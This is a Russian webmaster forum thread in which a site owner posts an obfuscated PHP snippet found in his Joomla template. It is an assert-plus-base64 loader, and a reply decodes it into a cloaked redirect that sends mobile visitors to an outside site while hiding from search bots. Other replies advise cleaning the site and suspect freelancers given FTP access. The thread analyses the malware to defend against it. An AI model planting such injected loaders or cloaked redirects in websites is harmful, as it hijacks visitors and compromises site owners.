Вломали сайт?

12
zaxavar
На сайте с 08.10.2012
Offline
183
835

Здравствуйте.

Нашел левый код в шаблоне, помогите его расшифровать.

Я так понимаю, надо перевернуть строку и декодировать в base 64

echo strrev("tress\x61"); @$_("e\166a\154\050b\141\163\145\066\064\137\144\145c\157\144\145\050'aWYgKChwcmVnX21hdGNoKCcvdGV4dFwvdm5kLndhcC53bWx8YXBwbGljYXRpb25cL3ZuZC53YXAueGh0bWxcK3htbC9zaScsIEAkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkgfHwgcHJlZ19tYXRjaCgnL2FsY2F0ZWx8YW1vaXxhbmRyb2lkfGF2YW50Z298YmxhY2tiZXJyeXxiZW5xfGNlbGx8Y3JpY2tldHxkb2NvbW98ZWxhaW5lfGh0Y3xpZW1vYmlsZXxpcGhvbmV8aXBhZHxpcGFxfGlwb2R8ajJtZXxqYXZhfG9wZXJhLm1pbml8bWlkcHxtbXB8bW9iaXxtb3Rvcm9sYXxuZWMtfG5va2lhfHBhbG18cGFuYXNvbmljfHBoaWxpcHN8cGhvbmV8c2FnZW18c2hhcnB8c2llLXxzbWFydHBob25lfHNvbnl8c3ltYmlhbnx0LW1vYmlsZXx0ZWx1c3x1cFwuYnJvd3Nlcnx1cFwubGlua3x2b2RhZm9uZXx3YXB8d2Vib3N8d2lyZWxlc3N8eGRhfHhvb218enRlL3NpJywgQCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgcHJlZ19tYXRjaCgnL21zZWFyY2h8bVw/cT0vc2knLCBAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkgJiYgIXByZWdfbWF0Y2goJy9tYWNpbnRvc2h8YW1lcmljYXxhdmFudHxkb3dubG9hZHx3aW5kb3dzXC1tZWRpYVwtcGxheWVyfHlhbmRleHxnb29nbGUvc2knLCBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgeyBlY2hvICc8c2NyaXB0PndpbmRvdy5sb2NhdGlvbj0iaHR0cDovL21vYmlsZS1tb2JpLmluZm8vPzIiPC9zY3JpcHQ+JzsgZmx1c2goKTsgZXhpdDsgfQ=='\051\051\073");
Вместо или вместе с Adsene - Adsterra - https://publishers.adsterra.com/referral/wf8uqXSYuu Раcскажу, подскажу.
6666
На сайте с 10.01.2005
Offline
505
#1
zaxavar:
Я так понимаю, надо перевернуть строку и декодировать в base 64

Зачем?

Начинайте чистить сайт, почитайте прилепленный топик. ИТД.

Каждое мое сообщение проверила и одобрила Елена Летучая. (c) Для меня очень важно все что Вы говорите! (http://surrealism.ru/123.mp3) .
Милованов Ю.С
На сайте с 24.01.2008
Offline
196
#2

не надо даже переворачивать. В пустой ПХП файл вставьте этот код и увидите результат в исходном коде страницы, когда откройте в браузере.

Подпись))
КВ
На сайте с 02.07.2012
Offline
47
#3

Это мобильный редирект, можешь удалять)


if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script>window.location="http://mobile-mobi.info/?2"</script>'; flush(); exit; }
zaxavar
На сайте с 08.10.2012
Offline
183
#4
Кот в сапогах:
Это мобильный редирект

Точно...


Зачем?
Начинайте чистить сайт, почитайте прилепленный топик. ИТД.

Давал ftp нескольким фрилансерам, а так чтобы ломанули маленькая вероятность, свежий сайт, только установленная joomla 2.5.9, трафик = 0

R
На сайте с 24.01.2008
Offline
180
#5

Возможно изначально эта зараза была в движке, может не только она.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
zaxavar
На сайте с 08.10.2012
Offline
183
#6
Rxp:
Возможно изначально эта зараза была в движке, может не только она.

В инсталяхе joomla с joomlacode.org ??

6666
На сайте с 10.01.2005
Offline
505
#7
zaxavar:
Давал ftp нескольким фрилансерам

У одного из них либо нет Касперского, либо совести. )

zaxavar
На сайте с 08.10.2012
Offline
183
#8
6666:
У одного из них либо нет Касперского, либо совести. )

Вот это скорее всего 🙅

6666
На сайте с 10.01.2005
Offline
505
#9

zaxavar, ага. Я после таких же фрилансеров 40 сайтов чистил. Под конец глаза были в пучок, реально. :)

zaxavar
На сайте с 08.10.2012
Offline
183
#10
6666:
zaxavar, ага. Я после таких же фрилансеров 40 сайтов чистил. Под конец глаза были в пучок, реально. :)

Так а как же быть?

Я понимаю, что допустим не всегда вина фрилансера может быть, где-то в системе у него сидит дрянь. Как сервак обезопасить? Ставить онлайн мониторинг что-ли?

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий